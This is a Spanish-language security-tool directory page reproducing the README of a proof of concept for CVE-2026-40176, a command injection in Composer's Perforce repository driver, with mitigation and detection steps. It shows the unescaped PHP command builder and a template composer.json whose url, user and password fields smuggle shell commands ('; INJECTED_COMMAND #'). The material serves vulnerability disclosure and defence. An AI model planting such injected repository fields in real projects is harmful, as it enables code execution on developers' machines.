Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-40176-cve-2026-40261 — Prueba de concepto que demuestra la inyección de comandos en el controlador Perforce de Composer (CVE-2026-40176), lo que permite la ejecución remota de código mediante una configuración de repositorio manipulada. | Kitploit
Herramientas/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlDesarrollo de Payloads
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Prueba de concepto que demuestra la inyección de comandos en el controlador Perforce de Composer (CVE-2026-40176), lo que permite la ejecución remota de código mediante una configuración de repositorio manipulada.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-40176

Ejecución Remota de Código (RCE) en el Repositorio Perforce de Composer

Composer Version Severity Type


📋 Resumen

Vulnerabilidad de Inyección de Comandos en el controlador de repositorio Perforce de Composer que permite la Ejecución Remota de Código (RCE) mediante una validación insuficiente de entrada en el procesamiento de URL del repositorio.


🎯 Detalles de la Vulnerabilidad

PropiedadValor
ID CVECVE-2026-40176
Versiones AfectadasComposer < 2.2.27
Tipo de VulnerabilidadInyección de Comandos
Vector de AtaqueConfiguración maliciosa del repositorio
ImpactoEjecución arbitraria de código
Puntuación CVSSAlta/Crítica

🔍 Descripción Técnica

La vulnerabilidad existe en cómo Composer procesa cuando el tipo es perforce. El parámetro no se sanitiza adecuadamente antes de pasarse a los comandos de shell, lo que permite a los atacantes inyectar comandos arbitrarios del sistema.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

Todo ello no se escapaba correctamente, lo que permitía a un atacante inyectar comandos creando una carga útil maliciosa para todos los campos con el tipo perforce.

Patrón de Código Vulnerable:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 Prueba de Concepto

Este repositorio contiene una prueba de concepto funcional que demuestra la vulnerabilidad.

Estructura del Proyecto

root@kitploit:~
CVE-2026-40176/
├── composer.json              # Configuración maliciosa del repositorio Perforce
├── vuln-composer.phar         # Composer 2.2.26 (VULNERABLE)
├── patched-composer.phar      # Composer 2.2.27 (CORREGIDO)
└── README.md                  # Este archivo

Pasos de Reproducción

1. Clonar el repositorio

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Verificar las versiones de Composer

root@kitploit:~
php vuln-composer.phar --version
# Salida: Composer version 2.2.26

php patched-composer.phar --version
# Salida: Composer version 2.2.27

3. Probar la versión vulnerable

root@kitploit:~
php vuln-composer.phar install
# O
php vuln-composer.phar update

4. Verificar la explotación

root@kitploit:~
ls -la /tmp/pwned

5. Probar la versión corregida (debería fallar)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# El archivo NO debería existir (la vulnerabilidad está corregida)

🛡️ Mitigación

Acciones Inmediatas

  1. Actualizar Composer a la versión 2.2.27 o posterior:

    root@kitploit:~
    composer self-update --2.2.27
    # O
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. Revisar todos los archivos composer.json en busca de configuraciones de repositorio desconocidas o sospechosas

  3. Auditar la cadena de suministro - Comprobar si alguna dependencia hace referencia a repositorios no confiables

Detección

root@kitploit:~
# Comprobar su versión de Composer
composer --version

# Buscar repositorios Perforce en sus proyectos
grep -r "perforce" */composer.json
Descargar herramienta